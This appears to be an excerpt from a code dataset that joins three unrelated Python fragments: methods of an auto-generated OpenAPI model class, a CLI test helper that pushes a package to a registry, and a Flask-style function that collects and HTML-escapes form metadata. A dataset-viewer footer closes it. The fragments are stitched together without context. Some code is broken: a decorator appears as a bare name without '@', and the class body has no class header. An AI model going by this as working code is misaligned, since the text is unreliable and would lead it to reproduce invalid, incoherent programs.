    attribute_map = {'cache_condition': 'cache_condition', 'content': 'content', 'content_type': 'content_type', 'name': 'name', 'status': 'status', 'response': 'response', 'request_condition': 'request_condition'}
    read_only_vars = {}
    _composed_schemas = {}
    _js_args_to_python_args
    def _from_openapi_data(cls, *args, **kwargs):
        """Instantiate from deserialized server data, bypassing read-only checks.

        Pops the framework-internal keyword arguments, rejects positional
        arguments, then stores every remaining keyword as an attribute.
        """
        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _path_to_item = kwargs.pop('_path_to_item', ())
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
        # Allocate without running __init__ so read-only attributes can be set.
        self = super(OpenApiModel, cls).__new__(cls)
        if args:
            raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
        for (var_name, var_value) in kwargs.items():
            # Silently drop unknown keys when the configuration asks for it
            # and the model declares no additional-properties type.
            if ((var_name not in self.attribute_map) and (self._configuration is not None) and self._configuration.discard_unknown_keys and (self.additional_properties_type is None)):
                continue
            setattr(self, var_name, var_value)
        return self
    # Internal attributes that must always exist on an instance.
    required_properties = set(['_data_store', '_check_type', '_spec_property_naming', '_path_to_item', '_configuration', '_visited_composed_classes'])
    _js_args_to_python_args
    def __init__(self, *args, **kwargs):
        """Construct from user-supplied keyword arguments.

        Unlike ``_from_openapi_data``, assigning a read-only attribute here
        raises ApiAttributeError.
        """
        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _path_to_item = kwargs.pop('_path_to_item', ())
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
        if args:
            raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
        for (var_name, var_value) in kwargs.items():
            if ((var_name not in self.attribute_map) and (self._configuration is not None) and self._configuration.discard_unknown_keys and (self.additional_properties_type is None)):
                continue
            setattr(self, var_name, var_value)
            if (var_name in self.read_only_vars):
                raise ApiAttributeError(f'`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate class with read only attributes.')
def push_package(package_id: PackageId, runner: CliRunner) -> None:
    """Push a local package to the registry via the CLI, best-effort.

    Creates a scratch agent, adds the package locally, copies it out of the
    agent's ``vendor`` directory into its own packages directory, and pushes
    it. Failures are printed but not raised (best-effort, so remaining
    packages can still be processed); the scratch agent is always deleted
    and the working directory restored.

    :param package_id: identifier (type + public id) of the package to push.
    :param runner: Click test runner used to invoke the CLI.
    """
    print('Trying to push {}: {}'.format(package_id.package_type.value, str(package_id.public_id)))
    cwd = os.getcwd()
    agent_name = 'some_agent'
    pushed = False  # only report success if the push actually completed
    try:
        result = runner.invoke(cli, [*CLI_LOG_OPTION, 'create', '--local', '--empty', agent_name], standalone_mode=False)
        assert (result.exit_code == 0)
        os.chdir(agent_name)
        result = runner.invoke(cli, [*CLI_LOG_OPTION, 'add', '--local', package_id.package_type.value, str(package_id.public_id)], standalone_mode=False)
        assert (result.exit_code == 0)
        # 'push' operates on the agent's own packages dir, not vendor/, so
        # copy the freshly added package across first.
        src = os.path.join('vendor', package_id.public_id.author, (package_id.package_type.value + 's'), package_id.public_id.name)
        dest = os.path.join((package_id.package_type.value + 's'), package_id.public_id.name)
        shutil.copytree(src, dest)
        result = runner.invoke(cli, [*CLI_LOG_OPTION, 'push', package_id.package_type.value, str(package_id.public_id)], standalone_mode=False)
        assert (result.exit_code == 0), "Publishing {} with public_id '{}' failed with: {}".format(package_id.package_type, package_id.public_id, result.output)
        pushed = True
    except Exception as e:
        # Best-effort: report and continue. (Fixed typo: "occured" -> "occurred".)
        print('\n\nAn exception occurred: {}\n\n'.format(e))
    finally:
        os.chdir(cwd)
        result = runner.invoke(cli, [*CLI_LOG_OPTION, 'delete', agent_name], standalone_mode=False)
        assert (result.exit_code == 0)
    if pushed:
        # Bug fix: previously this printed even after an exception, falsely
        # reporting success for a failed push.
        print('Successfully pushed {}: {}'.format(package_id.package_type.value, str(package_id.public_id)))
def _get_meta_from_request(request: Request):
    """Collect sample metadata from the submitted form, HTML-escaping free text."""
    # Escaped scalar fields, in their original insertion order.
    scalar_fields = ('device_name', 'device_part', 'device_class', 'vendor', 'version', 'release_date')
    meta = {field: escape(request.form[field]) for field in scalar_fields}
    meta['requested_analysis_systems'] = request.form.getlist('analysis_systems')
    meta['tags'] = escape(request.form['tags'])
    _get_meta_from_dropdowns(meta, request)
    # file_name is only present for some upload paths.
    if 'file_name' in request.form:
        meta['file_name'] = escape(request.form['file_name'])
    return meta
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.